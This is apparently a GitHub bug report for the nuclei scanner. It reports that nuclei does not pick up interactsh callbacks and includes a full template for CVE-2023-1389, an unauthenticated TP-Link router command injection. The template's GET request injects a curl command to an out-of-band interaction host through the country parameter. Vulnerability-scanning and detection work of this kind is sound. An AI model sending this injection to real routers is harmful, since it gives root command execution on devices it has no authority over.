### DISCUSSION TITLE
[BUG] Nuclei is not correlating interactsh-server

### DISCUSSION THREAD

**Discussion by DEVisions** [projectdiscovery/nuclei#5394] [Q&A]
### Current Behavior:
Nuclei is not correlating interaction in interact.sh with the current scan. If in my template I hardcode an address from `app.interactsh.com` there I see all interactions. If in my template I use `{{interactsh-url}}` Nuclei is not picking up the interactions and outputs:
`[INF] No results found. Better luck next time!`

### Expected Behavior:
Nuclei should output a True Positive for the vulnerability as I confirmed the payload is working correctly.

### Steps To Reproduce:
If you find a target you can use the template I'm working on. I could provide privately an example target.

### Template:

```yaml
id: CVE-2023-1389

info:
    name: TP-Link Router - Unauthenticated Command Injection
    author: DEVisions
    severity: high
    description: |
        Some TP-Link firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple GET or POST request.
    classification:
        cvss-metrics: 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'
        cvss-score: 8.8
        cve-id: CVE-2023-1389
        cwe-id: CWE-77
    metadata:
        product: TP-Link Router
    tags: cve,cve2023,tp-link,router,command-injection

variables:
    cmd: 'curl+http://{{interactsh-url}}'
    # cmd: 'curl+http://awcysojjnkloewdyrterfiq5a532vvcs5.oast.fun'  # hardcoded app.interactsh.com address that confirms the interaction happens

http:
    - raw:
          - |
              GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$({{cmd}}) HTTP/1.1
              Host: {{Hostname}}

      attack: batteringram
      payloads:
          count: [1, 2, 3] # Number of retries
      threads: 1

      stop-at-first-match: true
      matchers-condition: and
      matchers:
          - type: word
            part: interactsh_protocol # Confirms the DNS Interaction
            name: oob_interaction
            words:
                - 'http'
                - 'dns'
            condition: or
          - type: status
            part: header
            status:
                - 200
```

##### Picture as proof that when uncommenting the hard-coded value in the template and using that instead of the template placeholder `{{interactsh-url}}` the target indeed is interacting with interactsh and it's nuclei that it's not picking up said interaction.

![immagine](https://github.com/projectdiscovery/nuclei/assets/88578649/7f8cdf22-b107-49be-91f1-07e9604ef3a9)

### Anything else:
This issue should have been addressed [here in issue #1844](https://github.com/projectdiscovery/nuclei/issues/1844) but it's still present.
